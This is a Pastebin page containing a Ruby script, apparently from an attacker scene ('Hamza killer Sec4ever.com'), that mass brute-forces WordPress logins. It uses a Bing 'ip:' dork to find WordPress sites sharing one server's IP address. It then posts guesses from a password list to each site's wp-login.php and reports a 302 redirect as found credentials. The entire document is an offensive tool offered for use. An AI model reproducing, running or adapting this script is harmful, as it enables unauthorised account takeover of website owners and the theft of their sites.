Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/user/bin/ruby
- require 'net/http'
- require 'uri'
- def url(vu)
- uri = URI.parse(vu)
- xs="#{uri.scheme}://#{uri.host}/#{uri.path.split('/')[1]}"
- xss="#{xs}"
- return xss
- end
- class String
- def green; "\033[32m#{self}\033[0m" end
- def bg_green; "\033[42m#{self}\033[0m" end
- end
- def xip(ips)
- (0..15).each do |xdv|
- dork="ip:#{ips}+page_id="
- xs=URI("http://www.bing.com/search?q=#{dork}&first=#{xdv*10+1}")
- xd= Net::HTTP.get_response(xs)
- body=xd.body
- sos=body.scan(/<cite>(.*?)<strong>/)
- return sos.uniq
- end
- end
- def brut(urls,user,pwds)
- userz=user.chomp
- pwd=pwds.chomp
- ur=URI.parse(urls)
- pop=ur.host
- dd=ur.path
- http = Net::HTTP.new(pop, 80)
- #http.use_ssl = true
- path = "#{dd}/wp-login.php"
- ip="http://#{pop}#{dd}/wp-admin"
- resp, data = http.get(path, nil)
- cookie = resp.response['set-cookie']
- posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
- mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
- y = Thread.new {
- resp, data = http.post(path, posts, mps)
- }
- y.join(0.8)
- iz="http://#{pop}#{dd}"
- if resp.code == "302"
- print"[+] #{iz} \n".green
- print"[+] Found : #{userz} => #{pwd}\n".bg_green
- end
- end
- print"[+] Wordpress All server brut force multi thread [+]\n"
- print"[+] Hamza killer Sec4ever.com :D [+]\n"
- print("# Enter IP -> ")
- ipsz=gets.chomp
- print("# Enter Username ->")
- admin=gets.chomp
- print("# Enter Password list ->")
- pass=gets.chomp
- xs=IO.readlines(pass)
- xsdsq=xip(ipsz)
- for xdz in xsdsq
- dz=xdz.uniq
- for pdz in dz
- x=url("http://#{pdz}")
- print "| W0rking with #{x}\n"
- for pwd in xs
- brut(x,admin,pwd)
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement